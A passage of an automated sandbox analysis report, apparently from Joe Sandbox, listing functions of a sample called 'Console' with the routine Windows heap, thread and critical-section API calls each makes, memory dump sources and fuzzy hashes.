                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCriticalEventFreeHandleHeapLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2285707350-0
                                                                                                                                                                                                                          • Opcode ID: 17b8f4cf2e4e6561ac12f369bb6a8e4d10877c8d30fbaf5d187534a9fe60b3fe
                                                                                                                                                                                                                          • Instruction ID: e8ce2126ad996d5787635daffaab80e8f3939c20e6bfda14c4d4281525c80911
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17b8f4cf2e4e6561ac12f369bb6a8e4d10877c8d30fbaf5d187534a9fe60b3fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA71B4B0A04316CBEF65AF68C4487AABBF0BB00314F15076DD9E95B2D1CBB69584CBC0
                                                                                                                                                                                                                          Function 0122AA30 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?), ref: 0122AAD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                          • Opcode ID: 0773019d9606f7e04b6a6cb01159e87b5dab97e6019f26b82f27dc8f2160316b
                                                                                                                                                                                                                          • Instruction ID: 0c394a002bcc5c5e6009d050042581c28ccc26d7baed8577022c1fba0b798a8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0773019d9606f7e04b6a6cb01159e87b5dab97e6019f26b82f27dc8f2160316b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E221E53161022AAFDB24EA69C484BAD77FAEF64314F144099DA028BE52FB75DD42C790
                                                                                                                                                                                                                          Function 01151BE0 Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,00000018,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF,?,00000000,00FE37F7,00000000), ref: 01151C85
                                                                                                                                                                                                                            • Part of subcall function 01151AF0: RtlFreeHeap.NTDLL(00000000,?,00000000,0000000C,?,?,01151C48,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF), ref: 01151B17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: fe6635dc60da77562c471b336cd36b94545237acdee0598c0eecfacac21bf7f3
                                                                                                                                                                                                                          • Instruction ID: 30bcd1f6ceeff17fd42a5c10ac99cc38ec35d7ed5d324a28e2956ea8d26c021b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6635dc60da77562c471b336cd36b94545237acdee0598c0eecfacac21bf7f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40219AB5A00A15EFDB26CF18C984B66FBE9FB08710F04855AE929DB750D770B810CBA0
                                                                                                                                                                                                                          Function 01086510 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00010004,?), ref: 01086563
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                          • Opcode ID: bcbdd4644a94d973dfe0d0e58c04b477a302b426e6946bf034a3db1c248c3966
                                                                                                                                                                                                                          • Instruction ID: 34c9fb1ba726b2987e38ed627a96df13740eaf7bd44873f1eb5e4944fee0fe1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcbdd4644a94d973dfe0d0e58c04b477a302b426e6946bf034a3db1c248c3966
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3001D6726056155FD721AE2CDC00BDABBD8EB58761F01416AEDD8C7244EB72E86087E1
                                                                                                                                                                                                                          Function 01151AF0 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,00000000,0000000C,?,?,01151C48,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF), ref: 01151B17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 6ff8f95e87b07234be3e4bd19103e3d20718061ff4e53aefb34fccbf09da7716
                                                                                                                                                                                                                          • Instruction ID: fc4a4023a7e460d074be12fe528edef45b2d5b0ec5eb329025db1650de92b377
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ff8f95e87b07234be3e4bd19103e3d20718061ff4e53aefb34fccbf09da7716
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27E06D72200214FBDB255F0DE880F95BBACEB457A1F150036EE14AB215D370BC60CBB5
                                                                                                                                                                                                                          Function 01215DE0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,7CAB6A82,?,014B5610,000000FF,?,014AB3A3,00000000,?,01229DF6,00000000,00000030,7CAB6A82,?,00000000), ref: 01215E12
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: b81dff954ce05de44e1e94c09b846d4af303422e7804538788814ce4164f0b3b
                                                                                                                                                                                                                          • Instruction ID: fee0cb2399b4767467e94e9a97b0174d15b582906cba5485220759adcc2a6b06
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b81dff954ce05de44e1e94c09b846d4af303422e7804538788814ce4164f0b3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE09275A44548EFC721CF49ED41F56B7ECF709A10F10466AF919D3790D735A420CB50
                                                                                                                                                                                                                          Function 010BB150 Relevance: 1.4, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01085D50: SetEvent.KERNEL32(03BFE848,?,7CAB6A82), ref: 0108600C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010BB2D6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EventFreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2264064561-0
                                                                                                                                                                                                                          • Opcode ID: 6bec9b0595a12c200f32f0f68673076f44c6b41f5a472de4fe175e0e3f0b736f
                                                                                                                                                                                                                          • Instruction ID: 80a4b44e2f352ae6eb0419733db140cfe0f6ba1e467186e31b0da1a18de9b032
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bec9b0595a12c200f32f0f68673076f44c6b41f5a472de4fe175e0e3f0b736f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818DB0A002189FEB65CF68DC84BEDBBF5FF04304F544199D999AB291DB749984CF90
                                                                                                                                                                                                                          Function 0107ED80 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C27EDC,7CAB6A82,?,00000000,00000000,7CAB6A82,?,00000000), ref: 0107EF74
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          • Opcode ID: 77d2862647c1b6eeddac2e8d66bca2a51f5cb930cc08251bfc56aa87d439146c
                                                                                                                                                                                                                          • Instruction ID: e3598b47c09ae343f05c9d99b6173bb1166fe4c3a251df2bcc4faad6506bcb80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77d2862647c1b6eeddac2e8d66bca2a51f5cb930cc08251bfc56aa87d439146c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D271CE71E02205DFEB24CF58C844BAABFF4EB44710F1989AEE995AB391C7749900CB94
                                                                                                                                                                                                                          Function 01134450 Relevance: 1.4, APIs: 1, Instructions: 185memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000008,?), ref: 011345A6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 287a36ae766a9d39e9efa8678440afffc3ef9609878b1824d5d0be339caaf790
                                                                                                                                                                                                                          • Instruction ID: 3cb1b12ebcc5a82ca09daceb4e5f66df3ea5cb0a65d42a2c3d4862cb2ad6c397
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 287a36ae766a9d39e9efa8678440afffc3ef9609878b1824d5d0be339caaf790
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3851CF75A04206DFDB19CF1CD5809AEB7B2FF89310F1486A9D8449BB09D730AD51CB91
                                                                                                                                                                                                                          Function 014148E0 Relevance: 1.4, APIs: 1, Instructions: 161COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,7CAB6A82,?,?), ref: 01414A51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          • Opcode ID: ff28e08d2e395fd50a685d0bc88ab62a2d89d10ff1755ed87645715d1d467414
                                                                                                                                                                                                                          • Instruction ID: c41c1d76892c675e6d002b9ec897ec5b0e22d6131a9d56eab295b1a7cc4e0549
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff28e08d2e395fd50a685d0bc88ab62a2d89d10ff1755ed87645715d1d467414
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17515F75A0020A8FDB14CFADC980AAEBBF5FF48310F19456AE919E7365D734A901CB94
                                                                                                                                                                                                                          Function 0108D1D0 Relevance: 1.4, APIs: 1, Instructions: 117memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,05CAA940,?,00000000), ref: 0108D2AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: 863a147a18b27d64b6be88e30fbb0cb828a77e98a95d2af737f7323414ff4e4a
                                                                                                                                                                                                                          • Instruction ID: 2b6010e2aaa2118f54b8c3fd815fa5385dc12b483abe4b50a56736d43fea49c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 863a147a18b27d64b6be88e30fbb0cb828a77e98a95d2af737f7323414ff4e4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B641B1B1A00205DFDB14DF99D940BAEBBF5EF55320F04416EE915E7390DB70A900CB94
                                                                                                                                                                                                                          Function 00FCCEF0 Relevance: 1.3, APIs: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C5C530,?,7CAB6A82,0CB3F4BC,CEA1900B,?), ref: 00FCCF74
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
